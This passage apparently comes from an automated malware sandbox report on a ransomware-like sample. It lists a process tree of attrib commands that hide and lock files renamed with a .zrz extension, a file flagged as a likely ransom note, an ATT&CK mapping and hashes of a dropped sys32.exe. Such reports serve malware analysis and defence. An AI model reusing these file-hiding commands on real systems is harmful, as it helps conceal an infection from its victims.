  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jstat.zrz"
  2⤵
  PID:2036
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.zrz"
  2⤵
  PID:676
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\keytool.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:1152
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:560
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\kinit.zrz"
  2⤵
  PID:2888
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\klist.zrz"
  2⤵
  - Sets file to hidden
  PID:1916
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\ktab.zrz"
  2⤵
  PID:2892
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.zrz"
  2⤵
  PID:2944
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\orbd.zrz"
  2⤵
  PID:3020
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\pack200.zrz"
  2⤵
  PID:1068
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\policytool.zrz"
  2⤵
  PID:1448
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\rmic.zrz"
  2⤵
  PID:1776
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\rmid.zrz"
  2⤵
  PID:1760
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.zrz"
  2⤵
  PID:1696
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.zrz"
  2⤵
  PID:2004
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\serialver.zrz"
  2⤵
  - Sets file to hidden
  PID:2188
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\servertool.zrz"
  2⤵
  PID:2640
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.zrz"
  2⤵
  PID:1320
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.zrz"
  2⤵
  PID:2500
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.zrz"
  2⤵
  PID:2092
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.zrz"
  2⤵
  - Sets file to hidden
  PID:2000
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\bin\xjc.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:1996
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.zrz"
  2⤵
  PID:2432
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.zrz"
  2⤵
  PID:1344
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.zrz"
  2⤵
  PID:2228
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.zrz"
  2⤵
  PID:1884
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.zrz"
  2⤵
  PID:2364
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2352
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:1264
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.zrz"
  2⤵
  PID:1200
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.zrz"
  2⤵
  PID:1956
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2548
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.zrz"
  2⤵
  PID:988
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.zrz"
  2⤵
  PID:1728
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.zrz"
  2⤵
  - Sets file to hidden
  PID:2264
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.zrz"
  2⤵
  PID:2064
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.zrz"
  2⤵
  PID:1740
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.zrz"
  2⤵
  PID:2248
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.zrz"
  2⤵
  PID:2836
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.zrz"
  2⤵
  PID:2820
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.zrz"
  2⤵
  PID:2488
- C:\Windows\SysWOW64\attrib.exe
  "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.zrz"
  2⤵
  - Drops file in Program Files directory
  PID:2464

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-191877424437362490790444990-210859886-1897289196-69717699952549162668774253"
1⤵
PID:2932

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2080749872322157839-1318109020831723149-2145672668-3826917826553507272078661919"
1⤵
PID:2296

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17357909441195456993613592637527182010602246191-940039556-2007804896-143008622"
1⤵
- Drops file in Program Files directory
PID:2216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "56694331035534117318237106995060291150089115-1670775430102449232-756882822"
1⤵
PID:2664

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1971680307151598710412273624010325929807443306611882797160-121125548786711071"
1⤵
PID:676

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13031215141896290870-188656263416047757812001106424277187424-12018774512092286900"
1⤵
PID:2000

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1388323157808711065-1630343989-261804367-8382418928188783151458248520-1001214434"
1⤵
- Drops file in Program Files directory
PID:396

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1789750757-910313568247618618628224544-2061997499-836584974-836232252052878378"
1⤵
PID:1988

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15573938771730236466-726218475-1618424155-170252933796836311191393504-518407136"
1⤵
PID:1200

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1382872126-17266028029916997-1452820495644219275-19479528139515807901474657578"
1⤵
PID:2596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15569266601611050892078820648174034953131629315511882417877668027241100162390"
1⤵
PID:2264

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1670809669-423126697-1904441865600809861094083039-213325073219069759092072222006"
1⤵
- Drops file in Program Files directory
PID:1916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-48507124-815655195-3544960701831474918-1641426878-1758467868-188096374172823374"
1⤵
PID:1068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "729232997-1386362477-14787223279788703471113795779-215663252183866515785434903"
1⤵
PID:1760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1578086416443556877754118260131027773625212583-2000015283-117410230-1245603714"
1⤵
PID:988

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9368349245994636857748364121738114427-199548830414039721175022715131709427347"
1⤵
PID:2736

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:2432

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1748730872563306548-290327621-732300565-1191522415-1343622766-1104502065247506331"
1⤵
PID:2064

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2106804115-628968897-137920867610954409891168759154-21262720-923961809422860394"
1⤵
PID:2232

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9338735221395547716-5195001286077053511457025551-9968844488235287071869899067"
1⤵
- Drops file in Program Files directory
PID:3020

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20989128659458889558573932781520864018859718142809825117-643009769-54371928"
1⤵
PID:2640

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-195159896-7579316662115348474-2087879802-614037766834692477205771085-1876906936"
1⤵
PID:1320

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2044817194-17314677151679525930-3458380551593347461-28273317317394535561402493236"
1⤵
PID:1884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1668420031-709532465814307894-103905553310857148854867486961591215304353175240"
1⤵
PID:2820

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7882722252044956416100771109412460103959753973653435368-3721751171065268218"
1⤵
PID:1004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "113065021420699913101014080061-1628995614-9326462512144791534-8406831431025842983"
1⤵
PID:2812

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2029059162-1163097854-19296680766759745111960575194-146885149-384610832-50894751"
1⤵
PID:2532

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "415471816-11496651485025008311565204344-1085531881230871488454062980309247475"
1⤵
PID:972

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-91386140-1782582479-2585426371169830429976039623-414930374-1242043498-1827637053"
1⤵
PID:1916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1555146711198164193125707716242032509-1131729227606409174888249932212089727"
1⤵
PID:2888

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-187113088-12679403841831773315-4263347710635825121245196073053676381852129028"
1⤵
PID:2284

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\SendRename.hta"
1⤵
PID:936

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\UnpublishTest.ps1"
1⤵
- Opens file in notepad (likely ransom note)
PID:736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7z.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
C:\Users\Admin\AppData\Local\Temp\sys32.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
C:\Users\Admin\AppData\Local\Temp\sys32.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
C:\Users\Admin\AppData\Local\Temp\sys32.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
C:\Users\Admin\AppData\Local\Temp\sys32.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
C:\Users\Admin\AppData\Local\Temp\sys32.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
\Users\Admin\AppData\Local\Temp\sys32.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
\Users\Admin\AppData\Local\Temp\sys32.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
\Users\Admin\AppData\Local\Temp\sys32.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
\Users\Admin\AppData\Local\Temp\sys32.exe

Filesize
32KB

MD5
1830f906145a43cfb22a718b520b8661

SHA1
52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7

SHA256
2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

SHA512
4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632

Download Submit
memory/1420-307-0x00000000033B0000-0x0000000003E6A000-memory.dmp

Filesize
10.7MB

Download
memory/1420-221-0x00000000033B0000-0x0000000003E6A000-memory.dmp

Filesize
10.7MB

Download
memory/1548-231-0x0000000002E30000-0x00000000038EA000-memory.dmp

Filesize
10.7MB

Download
memory/2708-263-0x0000000003420000-0x0000000003EDA000-memory.dmp

Filesize
10.7MB

Download
memory/2708-240-0x00000000033E0000-0x0000000003E9A000-memory.dmp

Filesize
10.7MB

Download
memory/2708-306-0x00000000032E0000-0x0000000003D9A000-memory.dmp

Filesize
10.7MB

Download
memory/2708-232-0x00000000031E0000-0x0000000003C9A000-memory.dmp

Filesize
10.7MB

Download
memory/2708-230-0x00000000032E0000-0x0000000003D9A000-memory.dmp

Filesize
10.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads